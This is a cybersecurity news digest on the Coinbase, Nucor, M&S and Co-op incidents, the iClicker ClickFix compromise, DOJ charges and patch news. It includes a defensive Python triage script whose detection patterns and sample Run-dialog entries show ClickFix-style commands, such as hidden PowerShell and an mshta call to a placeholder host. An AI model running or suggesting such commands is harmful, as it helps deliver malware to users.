By the CyberWire staff
At a glance.
- Coinbase offers $20 million bounty for arrest of extortionists.
- US steel manufacturer hit by cyberattack.
- Marks and Spencer confirms customer data was stolen during cyberattack.
- Co-op continues recovery from cyberattack.
- iClicker website compromised to deliver malware.
- US DOJ charges twelve more suspects in theft of $263 million in cryptocurrency.
- Microsoft patches five actively exploited zero-days.
Coinbase offers $20 million bounty for arrest of extortionists.
Cryptocurrency exchange operator Coinbase has disclosed an extortion attempt involving theft of customer data, The Record reports. The company refused to pay a $20 million ransom demand and is instead offering $20 million for information leading to the arrest of the crooks.
Coinbase stated, "Cyber criminals bribed and recruited a group of rogue overseas support agents to steal Coinbase customer data to facilitate social engineering attacks. These insiders abused their access to customer support systems to steal the account data for a small subset of customers. No passwords, private keys, or funds were exposed and Coinbase Prime accounts are untouched. We will reimburse customers who were tricked into sending funds to the attacker."
Coinbase Chief Security Officer Philip Martin told Fortune that the bribed workers, who were located in India, have been fired.
US steel manufacturer hit by cyberattack.
North Carolina-based Nucor, one of the largest steel manufacturers in the world, has disclosed a cyberattack that led to "unauthorized third party access to certain information technology systems." The company took certain systems offline as a precaution, which halted production at some locations. The company says it is "currently in the process of restarting the affected operations," and is "actively investigating the incident with the assistance of leading external cybersecurity experts."
Manufacturing Dive notes that Nucor produces around a quarter of all raw steel in the US.
Marks and Spencer confirms customer data was stolen during cyberattack.
British retailer Marks and Spencer (M&S) has confirmed that customer data was stolen during last month's ransomware attack, BleepingComputer reports. The company says the leaked data includes "name, email address, addresses, telephone number, date of birth, online order history, household information, and ‘masked’ payment card details used for online purchases." M&S said in a Facebook post that the data "does not include usable card or payment details, or account passwords," but the company is forcing password resets for customer accounts as a precaution.
The company also warns customers to be on the lookout for phishing attacks exploiting the leaked information: "You do not need to take any action, but you might receive emails, calls, or texts claiming to be from M&S when they are not, so do be cautious. We will never contact you and ask you to provide us with personal account information, like usernames, and we will never ask you to give us your password."
Co-op continues recovery from cyberattack.
UK retail chain Co-op says systems are now running normally following a cyberattack earlier this month, Reuters reports. The incident disrupted grocery resupplies at some stores, leaving food shelves empty. The company says deliveries are back to normal, and stores should be better-stocked this weekend.
The DragonForce ransomware gang claims to have stolen information belonging to 20 million people who signed up for Co-op's membership program, BleepingComputer reports. Co-op hasn't confirmed this exact number, but said the attackers accessed data belonging to "a significant number of our current and past members." The breached information includes "Co-op Group members' personal data such as names and contact details, and did not include members' passwords, bank or credit card details, transactions or information relating to any members' or customers' products or services with the Co-op Group."
iClicker website compromised to deliver malware.
The website of iClicker, a popular student response and classroom engagement platform, was compromised to display a ClickFix social engineering attack designed to trick users into installing malware, BeyondMachines reports. ClickFix is a technique that silently copies a malicious command to the Windows clipboard, then instructs users to open a Run prompt, press Ctrl-V to paste, and hit Enter to run the command. In this case, the attack posed as a phony CAPTCHA verification prompt.
iClicker's site was compromised between April 12th and April 16th. Users who visited the site during that time and followed the directions of the fake CAPTCHA should be aware that they were likely infected.
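For responders checking machines that visited the site in that window, the sketch below triages Windows Run-dialog history (the per-user RunMRU registry values) for entries that look like a pasted ClickFix command. It is an added example, not code from the reports cited here; the indicator patterns are illustrative assumptions and the sample history is constructed, with payloads elided and placeholder hosts.

```python
import re

# Run-dialog history lives in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU;
# each value is the typed command followed by a literal "\1" suffix.
INTERPRETERS = re.compile(
    r"\b(?:powershell|pwsh|mshta|cmd|curl|msiexec|rundll32|regsvr32)(?:\.exe)?\b", re.I)

# Heuristic indicators (assumed for illustration, not a vetted rule set).
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(
        r"\s-(?:w|windowstyle)\s+h|\s-(?:e|enc|encodedcommand)\s", re.I),
    "fake_verification_text": re.compile(r"captcha|not a robot", re.I),
}

def indicators(entry: str) -> list[str]:
    """Return the indicator names that fire for one Run-dialog entry."""
    cmd = entry[:-2] if entry.endswith("\\1") else entry
    if not INTERPRETERS.search(cmd):
        return []  # plain paths, URLs and program names are normal Run usage
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def triage(entries: list[str]) -> list[tuple[str, list[str]]]:
    """Keep entries that launch an interpreter AND show at least one indicator."""
    hits = [(e, indicators(e)) for e in entries]
    return [(e, why) for e, why in hits if why]

# Constructed sample history; payloads are elided and hosts are placeholders.
SAMPLE_RUNMRU = [
    r'powershell -w hidden -c "<elided>" # I am not a robot: CAPTCHA ID 4821\1',
    r"mshta https://example.invalid/page\1",
    r"cmd\1",
    r"notepad C:\Users\sam\captcha-notes.txt\1",
    r"https://example.invalid/syllabus\1",
]

if __name__ == "__main__":
    for entry, why in triage(SAMPLE_RUNMRU):
        print(", ".join(why), "<-", entry)
```

A hit is a lead for further investigation, not proof of infection, and an empty result does not clear a host, since Run history can be overwritten or deleted.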
US DOJ charges twelve more suspects in theft of $263 million in cryptocurrency.
The US Justice Department has charged twelve additional individuals for their alleged roles in "a cyber-enabled racketeering conspiracy throughout the United States and abroad that netted them more than $263 million." The defendants are accused of various activities related to cryptocurrency theft, including carrying out physical burglaries to steal hardware wallets. Several of the suspects were arrested in California this week, while two are believed to be living abroad in Dubai.
The Justice Department stated, "The various roles included database hackers, organizers, target identifiers, callers, money launderers, and residential burglars targeting hardware virtual currency wallets. Database hackers hacked websites and servers to obtain cryptocurrency-related databases or purchased databases on the darkweb. Organizers and target identifiers organized and collated information across the databases to determine the most valuable targets. Callers cold-called victims and used social engineering to convince them their accounts were the subject of cyberattacks and the enterprise callers were attempting to help secure their accounts. Money launderers received the stolen crypto currency and turned it into fiat U.S. currency in the form of bulk cash or wire transfers."
Patch news.
Microsoft's May 2025 Patch Tuesday fixed five actively exploited zero-days, as well as two other zero-days that were publicly disclosed with no observed exploitation, BleepingComputer reports. KrebsOnSecurity notes that two of the zero-days (CVE-2025-32701 and CVE-2025-32706) affect the Windows Common Log File System (CLFS) driver, and are being used in attacks to escalate privileges.
Patch Tuesday also saw fixes from Adobe, Apple, SAP, Ivanti, Fortinet, Juniper Networks, VMware, and Zoom. ICS companies Siemens, Schneider Electric, and Phoenix Contact have patched vulnerabilities affecting industrial devices, SecurityWeek reports.
Google has issued emergency security updates to fix a high-severity vulnerability (CVE-2025-4664) affecting Chrome, BleepingComputer reports. The vulnerability is an insufficient policy enforcement issue that can allow "a remote attacker to leak cross-origin data via a crafted HTML page." It's not clear if the flaw is under active exploitation, but Google says it's "aware of reports that an exploit for CVE-2025-4664 exists in the wild."